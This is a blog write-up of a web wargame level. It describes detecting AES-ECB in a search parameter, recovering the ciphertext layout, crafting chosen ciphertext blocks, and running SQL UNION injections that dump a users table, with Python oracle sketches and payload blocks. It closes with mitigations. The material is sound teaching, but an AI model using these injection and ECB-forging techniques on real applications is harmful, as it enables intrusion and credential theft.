$> WARGAMES
Even though my daily work usually has little to do with security, I consider it a virtue to keep up to date with security basics and to try to maintain a certain breadth in my technical knowledge.
But perhaps more importantly, I find it to be a lot of fun to engage in what’s known as “wargames” – simulated hacking challenges which test one’s skills and reasoning.
If you’re a programmer with a knack for security you might have heard of the term “CTF” or “Capture The Flag” – events where individuals or teams compete to be the first to solve a set of challenges. Wargames are essentially the same, but without the time limit typically associated with CTFs. Many of them focus on teaching basic techniques rather than requiring novel approaches to convoluted problems.
$> THE FLAVOUR OF THE DAY: WEB
As one might expect, there are many kinds of wargames. Common broad themes include web applications, cryptography and binary exploitation (abusing buffer overflows and the like). Harder wargames can require knowledge of many different topics and of obscure language and/or configuration features.
I’m terrible with the web software stack and have therefore been afraid of trying web-themed wargames for a long time. I finally decided to change that by learning a bit and seeing how far I get. This post describes my way through one particularly interesting challenge I recently encountered after succeeding with some easier ones.
WARNING: Contains spoilers for a single level in a specific web wargame. It’s not the only writeup of this level, but you might still want to avoid reading if that sounds like something you’ll want to be doing by yourself.
$> GOAL
The goal of this challenge is simple: get the password to the next level. We know that the password can be found in the file /etc/passwords/password29 on the server if we can access it somehow, or it might be stored in some additional place we can get our hands on.
Let’s get right on it!
$> POKING AROUND
We land on a webpage that seems to host some sort of joke database. There appears to be a search feature which accepts input from us, and a notice proclaiming that this time we won’t be seeing the source code for the application we’re exploiting. Awww.
Let’s see what happens when we input some things manually…
The normal use seems simple enough: there exists a database of jokes, and we can search for text contained in them. Up to three are randomly picked if our query matches several entries.
After some trial and error, it seems like the application gracefully handles the good old SQL injection workhorses – quotes, dashes, pound signs and what have you.
But the URL looks interesting. And if something stands out in a wargame, it probably is.
If we manually mess with this URL, we get an interesting error.
A cursory DDG search reveals that this problem is usually related to AES encryption. That’s a good pointer.
$> SITEMAP
Based on what happens with our input and what we can see from the source code of the webpages, this is the sitemap we get:
http://site.name/ (same as index.php)
http://site.name/index.php
http://site.name/search.php
The input box on index.php results in an HTTP POST request to search.php, which eventually gets redirected to an HTTP GET with a transformed query parameter.
Otherwise there’s little of interest that we can glean from the source code of the pages.
(Also, calling search.php without parameters yields a cryptic result: just the string “mep”. This led me on a wild goose chase for a *.pem file (crypto certificate) that I half expected to be able to find. I can’t know for sure there isn’t one, but my time was certainly wasted. This can be interpreted as the site admins being cruel, or me being stupid – the latter of which is a terrible thought to entertain.)
$> STUDYING THE RESULTING URLS
Inputting the string ‘aaaaaaaaaaaa’ as query yields the following URL:
http://site.name/search.php?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D
Let’s pick out the query part:
G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D
And urldecode it:
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA+2078pAPR3X9UET9Bj0m9rt/c0tByJk=
Alphanumeric, with the addition of plus signs and slashes and equal signs at the end? Looks like base64.
Just decoding it to stdout messes up my terminal, so we’re looking at binary data. Let’s get a hexdump instead:
00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm..
00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\..
00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#..
00000030: ce82 a955 3b65 b812 80fb 6d3b f290 0f47 ...U;e....m;...G
00000040: 75fd 5044 fd06 3d26 f6bb 7f73 4b41 c899 u.PD..=&...sKA..
Yikes, I can’t make heads or tails out of it!
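For anyone who wants to follow along without a shell, here is a minimal Python sketch of the decoding steps above. The helper names (decode_query, hexdump) are made up for this illustration, and the dump format only imitates xxd.

```python
import base64
from urllib.parse import unquote

# The query parameter exactly as it appears in the URL above.
QUERY = (
    "G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6Oe"
    "zoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D"
)


def decode_query(query: str) -> bytes:
    """Undo the URL encoding, then the base64 layer."""
    return base64.b64decode(unquote(query))


def hexdump(data: bytes, width: int = 16) -> str:
    """Render bytes roughly the way xxd does: offset, hex pairs, printable ASCII."""
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        hex_part = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{offset:08x}: {hex_part}  {text}")
    return "\n".join(lines)


ciphertext = decode_query(QUERY)
print(len(ciphertext), "bytes")
print(hexdump(ciphertext))
```

The length alone is already a hint: it is a multiple of 16, which is what one would expect from a block cipher.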
Trying out more human-pseudo-random values with a quick and dirty bash/curl script gives the following bits of knowledge:
- The initial 32 bytes are always the same.
- The output is deterministic (the same input always results in the same output).
- Curiously, a string consisting of just a bunch of percent signs results in jokes being displayed despite not containing percent signs.
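My original probing was a throwaway bash/curl script, but the same idea can be sketched in Python with only the standard library. Several things here are assumptions on my part: that the POST form field is called "query" like the GET parameter, that no authentication is needed, and that site.name stands in for the real host. The helper names are hypothetical as well.

```python
import base64
import urllib.parse
import urllib.request

BASE_URL = "http://site.name"  # placeholder host, as used in the sitemap above


def ciphertext_from_url(url: str) -> bytes:
    """Pull the 'query' parameter out of a search.php URL and base64-decode it."""
    params = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    return base64.b64decode(params["query"][0])


def fetch_ciphertext(search_text: str) -> bytes:
    """POST a search (assumed field name: 'query') and decode the redirect target."""
    body = urllib.parse.urlencode({"query": search_text}).encode()
    with urllib.request.urlopen(BASE_URL + "/search.php", data=body) as response:
        return ciphertext_from_url(response.geturl())  # URL after following redirects


def common_prefix_blocks(a: bytes, b: bytes, block_size: int = 16) -> int:
    """Count how many leading blocks two ciphertexts share."""
    count = 0
    while (count + 1) * block_size <= min(len(a), len(b)):
        start = count * block_size
        if a[start:start + block_size] != b[start:start + block_size]:
            break
        count += 1
    return count
```

Calling fetch_ciphertext twice with the same input and comparing the results would check determinism, and common_prefix_blocks on two different inputs would show how much of the start stays fixed.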
$> CIPHER MODE DISCOVERY
Eventually, I ended up trying a really long repetition of a single character as input.
The result was the following:
00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm..
00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\..
00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#..
00000030: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000040: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000050: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000060: b4ed a087 d3c0 bea2 bedc 1b61 40b9 e2eb ...........a@...
00000070: ca8c f4e6 1091 3aba e39a 0676 1920 4a5a ......:....v. JZ
This is really good information – it reveals that blocks are independently encrypted (Electronic CodeBook mode rather than Cipher Block Chaining), and are 16 bytes (128 bits) long.
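Spotting the repetition by eye works, but it is also easy to automate. A small sketch (the function name is mine) that counts repeated 16-byte blocks in the dump above:

```python
from collections import Counter

# The ciphertext from the hexdump above, one 16-byte block per line.
CIPHERTEXT = bytes.fromhex(
    "1be82511a7ba5bfd578c0eef466db59c"
    "dc84728fdcf89d93751d10a7c75c8cf2"
    "c0872dee8bc90b1156913b08a223a39e"
    + "b39038c28df79b65d26151df58f7eaa3" * 3
    + "b4eda087d3c0bea2bedc1b6140b9e2eb"
    "ca8cf4e610913abae39a067619204a5a"
)


def repeated_blocks(data: bytes, block_size: int = 16) -> dict:
    """Map each block that occurs more than once to its number of occurrences."""
    blocks = [data[i:i + block_size] for i in range(0, len(data), block_size)]
    return {block.hex(): n for block, n in Counter(blocks).items() if n > 1}


print(repeated_blocks(CIPHERTEXT))
```

Any repeated block under a repetitive input is a strong hint of ECB, since chained modes would make identical plaintext blocks encrypt differently.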
$> CRACKING THE KEY
Yet another search engine query, this time on the subject of cracking 128 bit ECB AES, reveals that without more information about the key it would take approximately “Forever” to do that. It’s unlikely that we have that much time at our disposal so let’s look elsewhere.
$> CIPHERTEXT LAYOUT
We can now, however, figure out the layout of the ciphertext. (This is also where I moved from my shoddy shell script to the modern world with python3 and requests to better be able to automate it.)
I inserted ‘a’ characters one at a time until obtaining the first instance of the now familiar ciphertext of a block of 16 ‘a’ characters. This happened after 26 characters: 10 to fill up the third block and 16 for the full block of ‘a’ characters. We know from earlier that the first two 16-byte blocks are always the same, so there are six unknown bytes in the third.
Moving on from there, I inserted more ‘a’ characters until the ciphertext length increased by one block. This happened after three more characters. As per the specification of PKCS#7, if the length of the source mod the block size is zero, a full block of padding needs to be added. That means that three bytes in the last block earlier were just padding.
(Also that netted us the ciphertext of a valid padding-only block that we can use later.)
Putting all of this together, the result is as follows:
Legend:
P = unknown prefix
a = our query string
S = unknown suffix
PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaa
SSSSSSSSSSSSSSSS
SSSSSSSSSSSSS
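The two measurements behind this layout can be sketched against a local stand-in for the server. Everything about the stand-in is an assumption: the PREFIX and SUFFIX strings are invented (only their lengths, 38 and 29 bytes, mirror the layout above), and a truncated SHA-256 plays the role of AES because the standard library has no AES. It cannot be decrypted, but it is deterministic per block, which is all this experiment relies on.

```python
import hashlib

BLOCK = 16
# Hypothetical text wrapped around our input; only the lengths matter here.
PREFIX = b"SELECT * FROM jokes WHERE joke LIKE '%"
SUFFIX = b"%' ORDER BY RAND() LIMIT 3 --"
KEY = b"toy key"


def toy_ecb_oracle(user_input: bytes) -> bytes:
    """Stand-in for the server: PKCS#7 pad, then transform each block independently."""
    plaintext = PREFIX + user_input + SUFFIX
    pad = BLOCK - len(plaintext) % BLOCK  # always 1..16 bytes of padding
    plaintext += bytes([pad]) * pad
    return b"".join(
        hashlib.sha256(KEY + plaintext[i:i + BLOCK]).digest()[:BLOCK]
        for i in range(0, len(plaintext), BLOCK)
    )


def split_blocks(data: bytes) -> list:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def find_layout(oracle):
    # Learn what a block of sixteen 'a's encrypts to: it is the one that repeats.
    long_run = split_blocks(oracle(b"a" * 64))
    a_block = next(b for b in long_run if long_run.count(b) > 1)

    # Step 1: grow the input until that block first shows up.
    n = 1
    while a_block not in split_blocks(oracle(b"a" * n)):
        n += 1
    index = split_blocks(oracle(b"a" * n)).index(a_block)
    prefix_len = index * BLOCK - (n - BLOCK)

    # Step 2: keep growing until a whole extra (padding-only) block appears.
    base_len = len(oracle(b"a" * n))
    extra = 1
    while len(oracle(b"a" * (n + extra))) == base_len:
        extra += 1
    suffix_len = base_len - prefix_len - n - extra
    return prefix_len, n, extra, suffix_len


print(find_layout(toy_ecb_oracle))
```

The returned tuple holds the prefix length, the number of characters needed for the first full ‘a’ block, the extra characters needed to trigger the padding-only block, and the suffix length.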
While we can’t really know what the unknown parts are, it’d be reasonable to guess that in one way or another they’re related to querying a database, be it SQL or some clever php grepping in a directory with plain text files.
$> DECIPHERING THE TAIL (FAIL)
With this recent knowledge in hand, it seems straightforward enough to figure out the suffix:
By reducing the length of our input by one, we should get the ciphertext for the following:
PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaS -- b'abc123...'
SSSSSSSSSSSSSSSS
SSSSSSSSSSSS
Then, if we extend our input by one byte, iteratively trying out values for all possible bytes until we get the same ciphertext, we should be able to decipher the data one byte at a time.
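In code, the idea looks roughly like the sketch below. It runs against the same kind of local stand-in as before (invented PREFIX and SUFFIX, truncated SHA-256 instead of AES), and it assumes the server encrypts our input exactly as sent, with no escaping or other rewriting in between.

```python
import hashlib

BLOCK = 16
PREFIX = b"SELECT * FROM jokes WHERE joke LIKE '%"  # hypothetical, 38 bytes
SUFFIX = b"%' ORDER BY RAND() LIMIT 3 --"           # hypothetical, 29 bytes
KEY = b"toy key"


def toy_ecb_oracle(user_input: bytes) -> bytes:
    """Stand-in for the server; input is used verbatim (no escaping)."""
    plaintext = PREFIX + user_input + SUFFIX
    pad = BLOCK - len(plaintext) % BLOCK
    plaintext += bytes([pad]) * pad
    return b"".join(
        hashlib.sha256(KEY + plaintext[i:i + BLOCK]).digest()[:BLOCK]
        for i in range(0, len(plaintext), BLOCK)
    )


def split_blocks(data: bytes) -> list:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def recover_suffix(oracle, prefix_len: int, suffix_len: int) -> bytes:
    align = -prefix_len % BLOCK            # filler that completes the prefix's last block
    first = (prefix_len + align) // BLOCK  # index of the first block we fully control
    recovered = b""
    for i in range(suffix_len):
        # Shorten the filler so the next unknown byte lands last in its block.
        filler = b"a" * (align + BLOCK - 1 - i % BLOCK)
        target = first + i // BLOCK
        wanted = split_blocks(oracle(filler))[target]
        for guess in range(256):
            candidate = filler + recovered + bytes([guess])
            if split_blocks(oracle(candidate))[target] == wanted:
                recovered += bytes([guess])
                break
        else:
            break  # nothing matched, e.g. because the server altered our input
    return recovered


print(recover_suffix(toy_ecb_oracle, len(PREFIX), len(SUFFIX)))
```

Against the toy this recovers the whole suffix. The early exit in the inner loop is there for the case where no guess ever produces a match.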
Unfortunately, for mysterious reasons, this seemed to only work for a single byte (‘%’ – a percent sign) and then nothing would yield a matching ciphertext. I dabbled a while trying to figure out whether I had messed up something with my URL-encoding or so… but to no avail.
At this point I was at my wit’s (and weekend’s) end and let the problem rest for a few days.
$> A GIFT FROM THE GODS
While doing completely unrelated things at work, I stumbled across a SQL query like this:
"SELECT thing FROM things WHERE content LIKE 'prefix_%'"
And I remembered the recent percent sign oddity, as well as the one from the start of the challenge, and suddenly everything fell into place. By everything I mean both the realization that I clearly need to study more SQL and an idea of what seems to be happening behind the scenes in the challenge.
(For reference: ‘%’ acts as a wildcard for ‘zero or more characters’ in SQL LIKE patterns. Underscores match a single character, and I could quickly verify that our query treated these characters exactly so.)
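The wildcard behaviour is easy to try out locally. The sketch below uses Python's built-in sqlite3 purely as a convenient stand-in (I don't know for certain which database the challenge runs on), and the table and rows are made up.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE things (content TEXT)")
conn.executemany(
    "INSERT INTO things VALUES (?)",
    [("prefix_a",), ("prefixXa",), ("prefix_abc",), ("other",)],
)


def like(pattern: str) -> set:
    """Return every row whose content matches the LIKE pattern."""
    rows = conn.execute("SELECT content FROM things WHERE content LIKE ?", (pattern,))
    return {row[0] for row in rows}


print(like("prefix%"))   # '%' matches any run of characters, including none
print(like("prefix_a"))  # '_' matches exactly one character, whatever it is
print(like("%%%"))       # only wildcards: every row matches
```

The last call mirrors the earlier oddity: a search string made of nothing but percent signs matches everything, so jokes show up even though none of them contain a percent sign.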
We can now have a proper qualified guess at what’s hidden in the ciphertext:
SELECT * FROM JO
KES WHERE JOKE L
IKE '%aaaaaaaaaa
aaaaaaaaaaaaaa%'
COLLATE latin1_
general_cs_as
(Database people might observe that parts of this guess are very likely way off, but it’s good enough to get us moving forward.)
Come weekend, I leaped back into the fray.
$> CRAFTING
We now have a way forward – conceptually as easy as your run-of-the-mill SQL injection. We just have to mold our payload into a format that the application accepts.
So let’s make some blocks. We’ll craft something like this:
Legend:
P = unknown prefix
a = our padding and canaries
Q = the input we want ciphertext for
S = unknown suffix
PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaa
QQQQQQQQQQQQQQQQ
aaaaaaaaaaaaaaaa
SSSSSSSSSSSSSSSS
SSSSSSSSSSSSS
So for example, if we want the ciphertext for “16 BYTES OF JUNK”, we send in a query string like:
“aaaaaaaaaaaaaaaaaaaaaaaaaa16 BYTES OF JUNKaaaaaaaaaaaaaaaa”
And we should get a result with ciphertext blocks like:
...
b'b39038c28df79b65d26151df58f7eaa3' (canary)
b'deadbeefdeadbeefdeadbeefdeadbeef' (what we want)
b'b39038c28df79b65d26151df58f7eaa3' (canary)
...
And we can keep saving values for interesting 16 byte blocks to be used in our payload.
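The canary trick can be sketched as a small helper. As before, the oracle is a local stand-in with an invented prefix and suffix and a truncated SHA-256 in place of AES, and the function names are hypothetical.

```python
import hashlib

BLOCK = 16
PREFIX = b"SELECT * FROM jokes WHERE joke LIKE '%"  # hypothetical, 38 bytes
SUFFIX = b"%' ORDER BY RAND() LIMIT 3 --"           # hypothetical, 29 bytes
KEY = b"toy key"


def toy_block(block: bytes) -> bytes:
    """Deterministic per-block transform standing in for AES under a fixed key."""
    return hashlib.sha256(KEY + block).digest()[:BLOCK]


def toy_ecb_oracle(user_input: bytes) -> bytes:
    plaintext = PREFIX + user_input + SUFFIX
    pad = BLOCK - len(plaintext) % BLOCK
    plaintext += bytes([pad]) * pad
    return b"".join(toy_block(plaintext[i:i + BLOCK]) for i in range(0, len(plaintext), BLOCK))


def encrypt_block(oracle, block: bytes, prefix_len: int) -> bytes:
    """Get the ciphertext of one chosen 16-byte block, guarded by two canaries."""
    if len(block) != BLOCK:
        raise ValueError("block must be exactly 16 bytes")
    align = b"a" * (-prefix_len % BLOCK)  # finishes the prefix's partial block
    canary = b"a" * BLOCK
    ciphertext = oracle(align + canary + block + canary)
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    first = (prefix_len + len(align)) // BLOCK  # index of the leading canary
    if blocks[first] != blocks[first + 2]:
        raise ValueError("canaries differ: the input was probably altered on the way")
    return blocks[first + 1]


print(encrypt_block(toy_ecb_oracle, b"16 BYTES OF JUNK", len(PREFIX)).hex())
```

If the two canaries do not come back identical, something between us and the cipher changed the length or alignment of the input, and the middle block cannot be trusted.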
It turns out, however, that some inputs corrupt the canary value after our expected 16 byte ciphertext block – most notably quotes and backslashes. As is customary, it’s time to guess why. My guess is that before our query is encrypted, mysqli_real_escape_string is called on the input.
That means we can’t easily place quotes in the middle of a block. But we can feed this to the application:
aaaaaaaaaaaaaaa'
DataDataDataDat
To produce a ciphertext equivalent of:
aaaaaaaaaaaaaaa\
'DataDataDataDat
That’ll be enough for our purposes.
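The alignment shift is easier to see when simulated. The escape function below is a deliberately simplified stand-in that only handles quotes and backslashes; it is an assumption about what the server does, not the real mysqli_real_escape_string.

```python
BLOCK = 16


def simple_escape(text: str) -> str:
    """Prefix quotes and backslashes with a backslash (simplified escaping)."""
    return "".join("\\" + ch if ch in "'\"\\" else ch for ch in text)


def split_blocks(text: str) -> list:
    return [text[i:i + BLOCK] for i in range(0, len(text), BLOCK)]


# What we send: the quote sits at the very end of the first block.
sent = "a" * 15 + "'" + "DataDataDataDat"

# What gets encrypted: the added backslash pushes the quote into the next block.
for block in split_blocks(simple_escape(sent)):
    print(repr(block))
```

The second block now starts with an unescaped-looking quote, and its ciphertext can be lifted out and reused on its own.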
$> THE ATTACK
We now know how to craft our own ciphertexts and have a good idea of what the backend is doing.
We also observe that we can ignore the suffix of the query and replace it with the full padding block ciphertext we acquired earlier to shorten our query a bit and not have the suffix interfere with our experiments.
At this point I attempted many times to craft something useful and failed for various more or less stupid reasons. But since I’m writing this from a retrospective angle, I can pretend that I immediately arrived at this point:
SELECT * FROM JO -- b'1be82511a7ba5bfd578c0eef466db59c'
KES WHERE JOKE L -- b'dc84728fdcf89d93751d10a7c75c8cf2'
IKE '%aaaaaaaaaa -- b'c0872dee8bc90b1156913b08a223a39e'
' UNION SELECT -- b'36c550994e94298f5a065ac38ea9cbd7'
1;# -- b'9fb2c82683985bd21224f4a1dd70507e'
<16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'
If we concatenate those values, base64-encode the block, URL-encode the result, and send it to search.php, we get the following:
Looks very promising!
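The concatenate, base64-encode and URL-encode step can be sketched as follows. The function name is mine, and as a sanity check the example feeds in the five blocks from the very first hexdump rather than an attack payload.

```python
import base64
from urllib.parse import quote, unquote


def build_query_param(hex_blocks: list) -> str:
    """Join hex-encoded 16-byte blocks, base64-encode, then URL-encode everything."""
    raw = b"".join(bytes.fromhex(h) for h in hex_blocks)
    if len(raw) % 16 != 0:
        raise ValueError("payload must be a whole number of 16-byte blocks")
    return quote(base64.b64encode(raw).decode("ascii"), safe="")


# The blocks from the first hexdump in this post.
BLOCKS = [
    "1be82511a7ba5bfd578c0eef466db59c",
    "dc84728fdcf89d93751d10a7c75c8cf2",
    "c0872dee8bc90b1156913b08a223a39e",
    "ce82a9553b65b81280fb6d3bf2900f47",
    "75fd5044fd063d26f6bb7f734b41c899",
]

param = build_query_param(BLOCKS)
print("http://site.name/search.php?query=" + param)

# Round trip: decoding the parameter gives back the same bytes.
assert base64.b64decode(unquote(param)).hex() == "".join(BLOCKS)
```

Passing safe="" matters here: by default quote leaves ‘/’ untouched, while the URLs produced by the application encode it as %2F.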
Let’s proceed:
SELECT * FROM JO -- b'1be82511a7ba5bfd578c0eef466db59c'
KES WHERE JOKE L -- b'dc84728fdcf89d93751d10a7c75c8cf2'
IKE '%aaaaaaaaaa -- b'c0872dee8bc90b1156913b08a223a39e'
' UNION SELECT -- b'36c550994e94298f5a065ac38ea9cbd7'
table_name FROM -- b'49628aa9ea9f5f088b720ba991d91dc5'
information_sche -- b'0329a1abfe5c16ae68ce04abf9a935c8'
ma.tables;# -- b'3f74e043974e647b303b0c3e1cec6604'
<16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'
Bingo!
We get the entire list of table names. Two stand out: ‘jokes’ and ‘users’.
Let’s skip the jokes prefix too (and fix the error I got when my query result no longer contained a joke column):
SELECT column_na -- b'0bb623e8185083eb808d997e9dc9edc4'
me as joke from -- b'8e934d7e5200d5d5cda7344f3f9b7f3c'
informat -- b'eb8b19c46430e317918ce1727a6350e1'
ion_schema.colum -- b'ab1cb043f4546efcc1d8f97b217bcf2d'
ns where table_n -- b'44bd82dfac975e1d5f5c1aa784985be2'
ame LIKE -- b'7427adc2fafca6f328e5845b4c75d912'
'users%%%%%%%%%% -- b'cc221115d011307f2515496e360fa96b'
';# -- b'0018ad0c0200bda82423885bea3701fa'
<16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'
We get:
username
password
Finally:
select username -- b'2e935761dedf092525f2259d8444df3e'
as joke from use -- b'13b7a41e291aafeff2ebb88c17fd1c5a'
rs union select -- b'ebd89e1563dc499ce3140dc21567240d'
password from us -- b'8c11f169f048c2b9ef2739011035e2b0'
ers;# -- b'4cf81cbe37c5a5fac50c72e64c37fd8b'
<16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'
And we have completed the objective of the challenge: the username is “root@kali” and the secret password is “that is not how you specify the port”.
$> CONCLUSIONS
If you’ve read this far you’ve probably concluded that the challenge was not very realistic and the vulnerability could’ve been mitigated or prevented in multiple ways:
- Using different databases for login data and other, non-critical data
- Crafting the final SQL query closer to the database, making it difficult to bypass mysqli_real_escape_string
- Avoiding printing detailed error messages to the end user
- Using a mode of encryption that doesn’t encrypt identical blocks identically (such as CBC), ideally with an integrity check on the ciphertext, instead of ECB
- Not giving the end user direct access to the ciphertext
(Arguably there is little need for the extra encryption and data forwarding layer here at all, but let us assume that it is an unavoidable Business Requirement from upper management).
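As a small illustration of the second point, here is what building the query at the database layer could look like with a bound parameter. This is a sketch using Python's built-in sqlite3 rather than whatever the challenge actually runs, and the tables and rows are invented.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE jokes (joke TEXT)")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO jokes VALUES ('Why did the chicken cross the road?')")
conn.execute("INSERT INTO users VALUES ('admin', 'hunter2')")


def search_jokes(term: str) -> list:
    # The placeholder keeps the term as pure data; it never becomes SQL syntax.
    rows = conn.execute(
        "SELECT joke FROM jokes WHERE joke LIKE ? LIMIT 3",
        ("%" + term + "%",),
    )
    return [row[0] for row in rows]


print(search_jokes("chicken"))
print(search_jokes("' UNION SELECT password FROM users;#"))
```

With a bound parameter, the injection string is simply searched for as text and matches nothing. Note that ‘%’ and ‘_’ inside the term would still act as wildcards; that is a separate matter from injection.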
But all of that is beside the point! We explored, tried things, learned things and persisted until we found something that worked. Realistic scenario or not, that’s the workflow which yields results. And we had a lot of fun along the way, didn’t we?
If you think you might be interested in trying out some wargaming, here’s a good collection of sites to get started with:
https://www.wechall.net/active_sites
Everyone has their own preferences, so pick your poison and dive right in. If you don’t like a certain site, try another. If you’re very new, expect to be struggling a lot at the start – but there’s no need to rush, and indeed, you shouldn’t.
That’s all from me – hope you enjoyed the read and/or learned something!
Hugs,
Chrys